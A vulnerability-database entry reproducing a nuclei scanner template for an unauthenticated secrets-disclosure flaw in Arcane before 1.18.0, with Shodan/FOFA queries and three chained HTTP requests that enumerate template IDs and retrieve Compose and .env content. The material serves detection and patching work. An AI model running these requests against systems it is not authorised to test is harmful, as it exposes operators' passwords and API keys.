Lucene search
+L

Arcane < 1.18.0 - Unauthenticated Template and Env Disclosure

🗓️ 11 Aug 2026 07:28:29Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 3 Views

Unauthenticated access to /api/templates in Arcane < 1.18.0 exposes Compose YAML and .env secrets.

Related
Refs
Code
id: CVE-2026-42461

info:
  name: Arcane < 1.18.0 - Unauthenticated Template and Env Disclosure
  author: str4k3r
  severity: high
  description: |
    Arcane < 1.18.0 contains an information disclosure caused by missing authorization on /api/templates GET endpoints, letting unauthenticated network clients read sensitive Compose YAML and .env content, exploit requires network access
  impact: |
    Unauthenticated attackers can read sensitive operator secrets like database passwords and API keys, risking full system compromise.
  remediation: |
    Update to version 1.18.0 or later.
  reference:
    - https://github.com/getarcaneapp/arcane/security/advisories/GHSA-cxx3-hr75-4q96
    - https://nvd.nist.gov/vuln/detail/CVE-2026-42461
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-42461
    cwe-id: CWE-306
  metadata:
    verified: true
    max-request: 2
    vendor: getarcaneapp
    product: arcane
    shodan-query: html:"/api/app-images"
    fofa-query: body="/api/app-images"
  tags: cve,cve2026,arcane,exposure

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 3

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "/api/app-images")'
        condition: and
        internal: true

  - raw:
      - |
        GET /api/templates/all HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "BaseApiResponseListTemplate")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: tid
        part: body
        group: 1
        internal: true
        regex:
          - '"id"\s*:\s*"([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})"'

  - raw:
      - |
        GET /api/templates/{{tid}}/content HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "envContent")'
        condition: and
# digest: 4b0a0048304602210098fd3e7d2afd16ce78fbc06020c431935b938c115b58cf03754dfad35583b91c022100aeb476496c7c6becef2e4d135f90adac4f6723cd27c10830c3cca48115188d08:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Aug 2026 20:11Current
5.2Medium risk
Vulners AI Score5.2
CVSS 3.17.5
CVSS 48.7
EPSS0.0031
SSVC
3